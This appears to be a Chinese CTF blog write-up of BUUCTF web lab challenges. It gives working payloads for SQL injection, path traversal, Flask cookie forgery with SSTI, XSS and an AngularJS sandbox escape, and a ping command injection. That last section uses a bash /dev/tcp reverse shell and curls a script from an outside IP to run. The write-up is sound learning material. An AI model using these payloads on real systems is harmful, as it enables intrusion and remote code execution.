好久沒做buu的題了。 =.=
[第一章 web入門]SQL注入-2
訪問login.php源碼說?tips=1有東西,我們就隨便輸入用戶名和密碼抓包,得到參數名稱,name和pass,然后我比較懶直接sqlmap,網上也有師傅手工寫的挺好的:一道題講懂SQL盲注 題目詳解
python sqlmap.py -u "http://d9928328-e53e-484b-82c4-ebb5dd9c9836.node3.buuoj.cn/login.php?tips=1" --data="name=1'&pass=password&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql --dbs
雖然說懶吧,但是他跑了二十多分鍾是我沒想到的。
[第一章 web入門]afr_3
/proc/[pid],當查看當前進程的時候可以用/proc/self代替
cmdline — 啟動當前進程的完整命令,但僵屍進程目錄中的此文件不包含任何信息
cwd — 指向當前進程運行目錄的一個符號鏈接
environ — 當前進程的環境變量列表,彼此間用空字符(NULL)隔開;變量用大寫字母表示,其值用小寫字母表示
請求?name=../../../../../proc/self/cmdline獲取當前執行系統命令,得到
python server.py
?name=../../../../../proc/self/cwd/server.py獲取源碼
看到有個flag.py和key.py
在flag.py中應該是存在flag,但是不能查看
@app.route("/n1page", methods=["GET", "POST"])
def n1page():
if request.method != "POST":
return redirect(url_for("index"))
n1code = request.form.get("n1code") or None
if n1code is not None:
n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")
if "n1code" not in session or session['n1code'] is None:
session['n1code'] = n1code
template = None
if session['n1code'] is not None:
'''
這里存在SSTI
'''
template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' % session['n1code']
session['n1code'] = None
return render_template_string(template)
所以請求 name=../../../../../proc/self/cwd/key.py獲取appkey
偽造cookie為SSTI的payload獲取flag.
flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"
.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.YF1mtQ.r6f0HB-dwcCcrhuZrMaOxG2-n-A
[第二章 web進階]XSS闖關
level 1
level 2
username被escape編碼了,構造
?username=';alert(1);//
這樣username:
var username = ‘’;alert(1);//’;
成功執行了alert(1)。
level 3
他把我單引號過濾了,那我寫倆
?username='';alert(1);//
level 4
偽鏈接
javascript:alert(1),瀏覽器會把javascript后面的那一段內容當做代碼,直接在當前頁面執行。
代碼中接收jumpUrl作為跳轉url
/level4?jumpUrl=javascript:alert(1)
level 5
限制1
if(getQueryVariable('autosubmit') !== false){
autosubmit=1
限制2
autoForm.action = (getQueryVariable('action') == false) ? location.href : getQueryVariable('action');
同樣是傳值,只不過是傳我們的注入語句
完整payload
/level5?autosubmit=1&action=javascript:alert(1)
level 6
看一下這個環境用的是哪個模板,發現是AngularJS
參考:
我們的Angular版本是1.4.6,存在沙箱,因此要去搜索這個版本的Angular的沙箱逃逸的方法:
直接拷過來用
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
flag出。
[第二章 web進階]死亡ping命令
准備
首先開小buu號打開這個靶機
ssh連一下
額,這本身也是一個題。。。
看看它的ip
答題
這里建議直接到burp里操作,因為在網頁的話輸入的東西會被編碼。
發現它過濾了很多非法字符
用%0a代替;
可以。
由於docker是沒有bash、python程序的,並且sh反彈是不行的。
bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
目前是能通過折中的方式執行任意命令
編寫1.sh
請求bash到tmp目錄
127.0.0.1%0acurl your_buu_ip/1.sh > /tmp/1.sh #請求bash文件到tmp目錄 127.0.0.1%0acurl 117.21.200.166/1.sh > /tmp/1.sh
給bash加權限
127.0.0.1%0achmod 777 /tmp/1.sh
在117.21.200.166的機器上進行監聽8089端口
執行1.sh
終端回顯,flag出
[第二章 web進階]文件上傳
這個題吧,有點坑
<?php header("Content-Type:text/html; charset=utf-8"); // 每5分鍾會清除一次目錄下上傳的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo ' <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="ie=edge" /> <title>文件上傳章節練習題</title> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"> <style type="text/css"> .login-box{ margin-top: 100px; height: 500px; border: 1px solid #000; } body{ background: white; } .btn1{ width: 200px; } .d1{ display: block; height: 400px; } </style> </head> <body> <div class="container"> <div class="login-box col-md-12"> <form class="form-horizontal" method="post" enctype="multipart/form-data" > <h1>文件上傳章節練習題</h1> <hr /> <div class="form-group"> <label class="col-sm-2 control-label">選擇文件:</label> <div class="input-group col-sm-10"> <div > <label for=""> <input type="file" name="file" /> </label> </div> </div> </div> <div class="col-sm-8 text-right"> <input type="submit" class="btn btn-success text-right btn1" /> </div> </form> </div> </div> </body> </html> '; show_source(__FILE__); }else{ $file = $_FILES['file']; if(!$file){ exit("請勿上傳空文件"); } $name = $file['name']; $dir = 'upload/'; $ext = strtolower(substr(strrchr($name, '.'), 1)); $path = $dir.$name; function check_dir($dir){ $handle = opendir($dir); while(($f = readdir($handle)) !== false){ if(!in_array($f, array('.', '..'))){ if(is_dir($dir.$f)){ check_dir($dir.$f.'/'); }else{ $ext = strtolower(substr(strrchr($f, '.'), 1)); if(!in_array($ext, array('jpg', 'gif', 'png'))){ unlink($dir.$f); } } } } } if(!is_dir($dir)){ mkdir($dir); } $temp_dir = $dir.md5(time(). rand(1000,9999)); if(!is_dir($temp_dir)){ mkdir($temp_dir); } if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){ if($ext == 'zip'){ $archive = new PclZip($file['tmp_name']); foreach($archive->listContent() as $value){ $filename = $value["filename"]; if(preg_match('/\.php$/', $filename)){ exit("壓縮包內不允許含有php文件!"); } } if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) { check_dir($dir); exit("解壓失敗"); } check_dir($dir); exit('上傳成功!'); }else{ move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']); check_dir($dir); exit('上傳成功!'); } }else{ exit('僅允許上傳zip、jpg、gif、png文件!'); } }
通過解讀zip文件代碼可知,通過zip上傳后,服務器會對zip進行解壓,放在upload目錄下,然后如果這個目錄下含有非白名單的文件,就會對該文件進行刪除,所以一個辦法就是把文件解壓到upload目錄之外
我們發現使用了Apache,因此想到apache的解析漏洞。即構造xxxx.php.xxx,只要最后的xxx不能被解析,會繼續向左解析,因此php可以成功被解析。
先window下創一個壓縮包,把一句話寫到一個長度為你要改的長度的文件中,拖到zip壓縮包里,最好你原本文件名字的長度和你要改的長度一樣,不然你就哭吧
用的是010,
保存,上傳,訪問,成功
[第三章 web進階]SSTI
打開之后,發現就告訴我password is wrong,再看題目,模板注入,試試password,
就是flask模板注入。
通過以下語句拿到可用的類的列表
?password={{"".__class__.__bases__[0].__subclasses__()}}
寫個腳本
s= ["<class 'type'>", "<class 'weakref'>", "<class 'weakcallableproxy'>", "<class 'weakproxy'>", "<class 'int'>", "<class 'bytearray'>", "<class 'bytes'>", "<class 'list'>", "<class 'NoneType'>", "<class 'NotImplementedType'>", "<class 'traceback'>", "<class 'super'>", "<class 'range'>", "<class 'dict'>", "<class 'dict_keys'>", "<class 'dict_values'>", "<class 'dict_items'>", "<class 'odict_iterator'>", "<class 'set'>", "<class 'str'>", "<class 'slice'>", "<class 'staticmethod'>", "<class 'complex'>", "<class 'float'>", "<class 'frozenset'>", "<class 'property'>", "<class 'managedbuffer'>", "<class 'memoryview'>", "<class 'tuple'>", "<class 'enumerate'>", "<class 'reversed'>", "<class 'stderrprinter'>", "<class 'code'>", "<class 'frame'>", "<class 'builtin_function_or_method'>", "<class 'method'>", "<class 'function'>", "<class 'mappingproxy'>", "<class 'generator'>", "<class 'getset_descriptor'>", "<class 'wrapper_descriptor'>", "<class 'method-wrapper'>", "<class 'ellipsis'>", "<class 'member_descriptor'>", "<class 'types.SimpleNamespace'>", "<class 'PyCapsule'>", "<class 'longrange_iterator'>", "<class 'cell'>", "<class 'instancemethod'>", "<class 'classmethod_descriptor'>", "<class 'method_descriptor'>", "<class 'callable_iterator'>", "<class 'iterator'>", "<class 'coroutine'>", "<class 'coroutine_wrapper'>", "<class 'moduledef'>", "<class 'module'>", "<class 'EncodingMap'>", "<class 'fieldnameiterator'>", "<class 'formatteriterator'>", "<class 'filter'>", "<class 'map'>", "<class 'zip'>", "<class 'BaseException'>", "<class 'hamt'>", "<class 'hamt_array_node'>", "<class 'hamt_bitmap_node'>", "<class 'hamt_collision_node'>", "<class 'keys'>", "<class 'values'>", "<class 'items'>", "<class 'Context'>", "<class 'ContextVar'>", "<class 'Token'>", "<class 'Token.MISSING'>", "<class '_frozen_importlib._ModuleLock'>", "<class '_frozen_importlib._DummyModuleLock'>", "<class '_frozen_importlib._ModuleLockManager'>", "<class '_frozen_importlib._installed_safely'>", "<class '_frozen_importlib.ModuleSpec'>", "<class '_frozen_importlib.BuiltinImporter'>", "<class 'classmethod'>", "<class '_frozen_importlib.FrozenImporter'>", "<class '_frozen_importlib._ImportLockContext'>", "<class '_thread._localdummy'>", "<class '_thread._local'>", "<class '_thread.lock'>", "<class '_thread.RLock'>", "<class 'zipimport.zipimporter'>", "<class '_frozen_importlib_external.WindowsRegistryFinder'>", "<class '_frozen_importlib_external._LoaderBasics'>", "<class '_frozen_importlib_external.FileLoader'>", "<class '_frozen_importlib_external._NamespacePath'>", "<class '_frozen_importlib_external._NamespaceLoader'>", "<class '_frozen_importlib_external.PathFinder'>", "<class '_frozen_importlib_external.FileFinder'>", "<class '_io._IOBase'>", "<class '_io._BytesIOBuffer'>", "<class '_io.IncrementalNewlineDecoder'>", "<class 'posix.ScandirIterator'>", "<class 'posix.DirEntry'>", "<class 'codecs.Codec'>", "<class 'codecs.IncrementalEncoder'>", "<class 'codecs.IncrementalDecoder'>", "<class 'codecs.StreamReaderWriter'>", "<class 'codecs.StreamRecoder'>", "<class '_abc_data'>", "<class 'abc.ABC'>", "<class 'dict_itemiterator'>", "<class 'collections.abc.Hashable'>", "<class 'collections.abc.Awaitable'>", "<class 'collections.abc.AsyncIterable'>", "<class 'async_generator'>", "<class 'collections.abc.Iterable'>", "<class 'bytes_iterator'>", "<class 'bytearray_iterator'>", "<class 'dict_keyiterator'>", "<class 'dict_valueiterator'>", "<class 'list_iterator'>", "<class 'list_reverseiterator'>", "<class 'range_iterator'>", "<class 'set_iterator'>", "<class 'str_iterator'>", "<class 'tuple_iterator'>", "<class 'collections.abc.Sized'>", "<class 'collections.abc.Container'>", "<class 'collections.abc.Callable'>", "<class 'os._wrap_close'>", "<class '_sitebuiltins.Quitter'>", "<class '_sitebuiltins._Printer'>", "<class '_sitebuiltins._Helper'>", "<class 'types.DynamicClassAttribute'>", "<class 'types._GeneratorWrapper'>", "<class 'collections.deque'>", "<class '_collections._deque_iterator'>", "<class '_collections._deque_reverse_iterator'>", "<class 'enum.auto'>", "<enum 'Enum'>", "<class 're.Pattern'>", "<class 're.Match'>", "<class '_sre.SRE_Scanner'>", "<class 'sre_parse.Pattern'>", "<class 'sre_parse.SubPattern'>", "<class 'sre_parse.Tokenizer'>", "<class 'functools.partial'>", "<class 'functools._lru_cache_wrapper'>", "<class 'operator.itemgetter'>", "<class 'operator.attrgetter'>", "<class 'operator.methodcaller'>", "<class 'itertools.accumulate'>", "<class 'itertools.combinations'>", "<class 'itertools.combinations_with_replacement'>", "<class 'itertools.cycle'>", "<class 'itertools.dropwhile'>", "<class 'itertools.takewhile'>", "<class 'itertools.islice'>", "<class 'itertools.starmap'>", "<class 'itertools.chain'>", "<class 'itertools.compress'>", "<class 'itertools.filterfalse'>", "<class 'itertools.count'>", "<class 'itertools.zip_longest'>", "<class 'itertools.permutations'>", "<class 'itertools.product'>", "<class 'itertools.repeat'>", "<class 'itertools.groupby'>", "<class 'itertools._grouper'>", "<class 'itertools._tee'>", "<class 'itertools._tee_dataobject'>", "<class 'reprlib.Repr'>", "<class 'collections._Link'>", "<class 'functools.partialmethod'>", "<class 're.Scanner'>", "<class 'string.Template'>", "<class 'string.Formatter'>", "<class 'markupsafe._MarkupEscapeHelper'>", "<class 'warnings.WarningMessage'>", "<class 'warnings.catch_warnings'>", "<class 'zlib.Compress'>", "<class 'zlib.Decompress'>", "<class 'tokenize.Untokenizer'>", "<class 'traceback.FrameSummary'>", "<class 'traceback.TracebackException'>", "<class '_weakrefset._IterationGuard'>", "<class '_weakrefset.WeakSet'>", "<class 'threading._RLock'>", "<class 'threading.Condition'>", "<class 'threading.Semaphore'>", "<class 'threading.Event'>", "<class 'threading.Barrier'>", "<class 'threading.Thread'>", "<class '_bz2.BZ2Compressor'>", "<class '_bz2.BZ2Decompressor'>", "<class '_lzma.LZMACompressor'>", "<class '_lzma.LZMADecompressor'>", "<class '_hashlib.HASH'>", "<class '_blake2.blake2b'>", "<class '_blake2.blake2s'>", "<class '_sha3.sha3_224'>", "<class '_sha3.sha3_256'>", "<class '_sha3.sha3_384'>", "<class '_sha3.sha3_512'>", "<class '_sha3.shake_128'>", "<class '_sha3.shake_256'>", "<class '_random.Random'>", "<class 'weakref.finalize._Info'>", "<class 'weakref.finalize'>", "<class 'tempfile._RandomNameSequence'>", "<class 'tempfile._TemporaryFileCloser'>", "<class 'tempfile._TemporaryFileWrapper'>", "<class 'tempfile.SpooledTemporaryFile'>", "<class 'tempfile.TemporaryDirectory'>", "<class 'Struct'>", "<class 'unpack_iterator'>", "<class 'pickle._Framer'>", "<class 'pickle._Unframer'>", "<class 'pickle._Pickler'>", "<class 'pickle._Unpickler'>", "<class '_pickle.Unpickler'>", "<class '_pickle.Pickler'>", "<class '_pickle.Pdata'>", "<class '_pickle.PicklerMemoProxy'>", "<class '_pickle.UnpicklerMemoProxy'>", "<class 'urllib.parse._ResultMixinStr'>", "<class 'urllib.parse._ResultMixinBytes'>", "<class 'urllib.parse._NetlocResultMixinBase'>", "<class '_json.Scanner'>", "<class '_json.Encoder'>", "<class 'json.decoder.JSONDecoder'>", "<class 'json.encoder.JSONEncoder'>", "<class 'jinja2.utils.MissingType'>", "<class 'jinja2.utils.LRUCache'>", "<class 'jinja2.utils.Cycler'>", "<class 'jinja2.utils.Joiner'>", "<class 'jinja2.utils.Namespace'>", "<class 'jinja2.bccache.Bucket'>", "<class 'jinja2.bccache.BytecodeCache'>", "<class 'jinja2.nodes.EvalContext'>", "<class 'jinja2.nodes.Node'>", "<class 'jinja2.visitor.NodeVisitor'>", "<class 'jinja2.idtracking.Symbols'>", "<class '__future__._Feature'>", "<class 'jinja2.compiler.MacroRef'>", "<class 'jinja2.compiler.Frame'>", "<class 'jinja2.runtime.TemplateReference'>", "<class 'jinja2.runtime.Context'>", "<class 'jinja2.runtime.BlockReference'>", "<class 'jinja2.runtime.LoopContext'>", "<class 'jinja2.runtime.Macro'>", "<class 'jinja2.runtime.Undefined'>", "<class 'decimal.Decimal'>", "<class 'decimal.Context'>", "<class 'decimal.SignalDictMixin'>", "<class 'decimal.ContextManager'>", "<class 'numbers.Number'>", "<class '_ast.AST'>", "<class 'ast.NodeVisitor'>", "<class 'jinja2.lexer.Failure'>", "<class 'jinja2.lexer.TokenStreamIterator'>", "<class 'jinja2.lexer.TokenStream'>", "<class 'jinja2.lexer.Lexer'>", "<class 'jinja2.parser.Parser'>", "<class 'jinja2.environment.Environment'>", "<class 'jinja2.environment.Template'>", "<class 'jinja2.environment.TemplateModule'>", "<class 'jinja2.environment.TemplateExpression'>", "<class 'jinja2.environment.TemplateStream'>", "<class 'jinja2.loaders.BaseLoader'>", "<class 'select.poll'>", "<class 'select.epoll'>", "<class 'selectors.BaseSelector'>", "<class '_socket.socket'>", "<class 'datetime.date'>", "<class 'datetime.timedelta'>", "<class 'datetime.time'>", "<class 'datetime.tzinfo'>", "<class 'dis.Bytecode'>", "<class 'inspect.BlockFinder'>", "<class 'inspect._void'>", "<class 'inspect._empty'>", "<class 'inspect.Parameter'>", "<class 'inspect.BoundArguments'>", "<class 'inspect.Signature'>", "<class 'logging.LogRecord'>", "<class 'logging.PercentStyle'>", "<class 'logging.Formatter'>", "<class 'logging.BufferingFormatter'>", "<class 'logging.Filter'>", "<class 'logging.Filterer'>", "<class 'logging.PlaceHolder'>", "<class 'logging.Manager'>", "<class 'logging.LoggerAdapter'>", "<class 'werkzeug._internal._Missing'>", "<class 'werkzeug._internal._DictAccessorProperty'>", "<class 'importlib.abc.Finder'>", "<class 'importlib.abc.Loader'>", "<class 'importlib.abc.ResourceReader'>", "<class 'contextlib.ContextDecorator'>", "<class 'contextlib._GeneratorContextManagerBase'>", "<class 'contextlib._BaseExitStack'>", "<class 'pkgutil.ImpImporter'>", "<class 'pkgutil.ImpLoader'>", "<class 'werkzeug.utils.HTMLBuilder'>", "<class 'werkzeug.exceptions.Aborter'>", "<class 'werkzeug.urls.Href'>", "<class 'socketserver.BaseServer'>", "<class 'socketserver.ForkingMixIn'>", "<class 'socketserver.ThreadingMixIn'>", "<class 'socketserver.BaseRequestHandler'>", "<class 'calendar._localized_month'>", "<class 'calendar._localized_day'>", "<class 'calendar.Calendar'>", "<class 'calendar.different_locale'>", "<class 'email._parseaddr.AddrlistClass'>", "<class 'email.charset.Charset'>", "<class 'email.header.Header'>", "<class 'email.header._ValueFormatter'>", "<class 'email._policybase._PolicyBase'>", "<class 'email.feedparser.BufferedSubFile'>", "<class 'email.feedparser.FeedParser'>", "<class 'email.parser.Parser'>", "<class 'email.parser.BytesParser'>", "<class 'email.message.Message'>", "<class 'http.client.HTTPConnection'>", "<class '_ssl._SSLContext'>", "<class '_ssl._SSLSocket'>", "<class '_ssl.MemoryBIO'>", "<class '_ssl.Session'>", "<class 'ssl.SSLObject'>", "<class 'mimetypes.MimeTypes'>", "<class 'click._compat._FixupStream'>", "<class 'click._compat._AtomicFile'>", "<class 'click.utils.LazyFile'>", "<class 'click.utils.KeepOpenFile'>", "<class 'click.utils.PacifyFlushWrapper'>", "<class 'click.parser.Option'>", "<class 'click.parser.Argument'>", "<class 'click.parser.ParsingState'>", "<class 'click.parser.OptionParser'>", "<class 'click.types.ParamType'>", "<class 'click.formatting.HelpFormatter'>", "<class 'click.core.Context'>", "<class 'click.core.BaseCommand'>", "<class 'click.core.Parameter'>", "<class 'werkzeug.serving.WSGIRequestHandler'>", "<class 'werkzeug.serving._SSLContext'>", "<class 'werkzeug.serving.BaseWSGIServer'>", "<class 'werkzeug.datastructures.ImmutableListMixin'>", "<class 'werkzeug.datastructures.ImmutableDictMixin'>", "<class 'werkzeug.datastructures.UpdateDictMixin'>", "<class 'werkzeug.datastructures.ViewItems'>", "<class 'werkzeug.datastructures._omd_bucket'>", "<class 'werkzeug.datastructures.Headers'>", "<class 'werkzeug.datastructures.ImmutableHeadersMixin'>", "<class 'werkzeug.datastructures.IfRange'>", "<class 'werkzeug.datastructures.Range'>", "<class 'werkzeug.datastructures.ContentRange'>", "<class 'werkzeug.datastructures.FileStorage'>", "<class 'urllib.request.Request'>", "<class 'urllib.request.OpenerDirector'>", "<class 'urllib.request.BaseHandler'>", "<class 'urllib.request.HTTPPasswordMgr'>", "<class 'urllib.request.AbstractBasicAuthHandler'>", "<class 'urllib.request.AbstractDigestAuthHandler'>", "<class 'urllib.request.URLopener'>", "<class 'urllib.request.ftpwrapper'>", "<class 'werkzeug.wrappers.accept.AcceptMixin'>", "<class 'werkzeug.wrappers.auth.AuthorizationMixin'>", "<class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>", "<class 'werkzeug.wsgi.ClosingIterator'>", "<class 'werkzeug.wsgi.FileWrapper'>", "<class 'werkzeug.wsgi._RangeWrapper'>", "<class 'werkzeug.formparser.FormDataParser'>", "<class 'werkzeug.formparser.MultiPartParser'>", "<class 'werkzeug.wrappers.base_request.BaseRequest'>", "<class 'werkzeug.wrappers.base_response.BaseResponse'>", "<class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>", "<class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>", "<class 'werkzeug.wrappers.etag.ETagRequestMixin'>", "<class 'werkzeug.wrappers.etag.ETagResponseMixin'>", "<class 'werkzeug.wrappers.cors.CORSRequestMixin'>", "<class 'werkzeug.wrappers.cors.CORSResponseMixin'>", "<class 'werkzeug.useragents.UserAgentParser'>", "<class 'werkzeug.useragents.UserAgent'>", "<class 'werkzeug.wrappers.user_agent.UserAgentMixin'>", "<class 'werkzeug.wrappers.request.StreamOnlyMixin'>", "<class 'werkzeug.wrappers.response.ResponseStream'>", "<class 'werkzeug.wrappers.response.ResponseStreamMixin'>", "<class 'http.cookiejar.Cookie'>", "<class 'http.cookiejar.CookiePolicy'>", "<class 'http.cookiejar.Absent'>", "<class 'http.cookiejar.CookieJar'>", "<class 'werkzeug.test._TestCookieHeaders'>", "<class 'werkzeug.test._TestCookieResponse'>", "<class 'werkzeug.test.EnvironBuilder'>", "<class 'werkzeug.test.Client'>", "<class 'uuid.UUID'>", "<class 'itsdangerous._json._CompactJSON'>", "<class 'hmac.HMAC'>", "<class 'itsdangerous.signer.SigningAlgorithm'>", "<class 'itsdangerous.signer.Signer'>", "<class 'itsdangerous.serializer.Serializer'>", "<class 'itsdangerous.url_safe.URLSafeSerializerMixin'>", "<class 'flask._compat._DeprecatedBool'>", "<class 'werkzeug.local.Local'>", "<class 'werkzeug.local.LocalStack'>", "<class 'werkzeug.local.LocalManager'>", "<class 'werkzeug.local.LocalProxy'>", "<class 'dataclasses._HAS_DEFAULT_FACTORY_CLASS'>", "<class 'dataclasses._MISSING_TYPE'>", "<class 'dataclasses._FIELD_BASE'>", "<class 'dataclasses.InitVar'>", "<class 'dataclasses.Field'>", "<class 'dataclasses._DataclassParams'>", "<class 'difflib.SequenceMatcher'>", "<class 'difflib.Differ'>", "<class 'difflib.HtmlDiff'>", "<class 'pprint._safe_key'>", "<class 'pprint.PrettyPrinter'>", "<class 'werkzeug.routing.RuleFactory'>", "<class 'werkzeug.routing.RuleTemplate'>", "<class 'werkzeug.routing.BaseConverter'>", "<class 'werkzeug.routing.Map'>", "<class 'werkzeug.routing.MapAdapter'>", "<class 'subprocess.CompletedProcess'>", "<class 'subprocess.Popen'>", "<class 'flask.signals.Namespace'>", "<class 'flask.signals._FakeSignal'>", "<class 'flask.helpers.locked_cached_property'>", "<class 'flask.helpers._PackageBoundObject'>", "<class 'flask.cli.DispatchingApp'>", "<class 'flask.cli.ScriptInfo'>", "<class 'flask.config.ConfigAttribute'>", "<class 'flask.ctx._AppCtxGlobals'>", "<class 'flask.ctx.AppContext'>", "<class 'flask.ctx.RequestContext'>", "<class 'flask.json.tag.JSONTag'>", "<class 'flask.json.tag.TaggedJSONSerializer'>", "<class 'flask.sessions.SessionInterface'>", "<class 'werkzeug.wrappers.json._JSONModule'>", "<class 'werkzeug.wrappers.json.JSONMixin'>", "<class 'flask.blueprints.BlueprintSetupState'>", "<class 'jinja2.ext.Extension'>", "<class 'jinja2.ext._CommentFinder'>", "<class 'unicodedata.UCD'>"] a="os" count=0 for i in s: if a in i: print("{}{}".format(i,count)) count+=1
?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}
經過手工遍歷,找到flag
../?password={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat /app/server.py').read()}}
ssti:https://www.cnblogs.com/20175211lyz/p/11425368.html
[第三章 web進階]Python里的SSRF
emmm,
應該是127.0.0.1被禁止了,localhost也被禁止了
[第三章 web進階]thinkphp反序列化利用鏈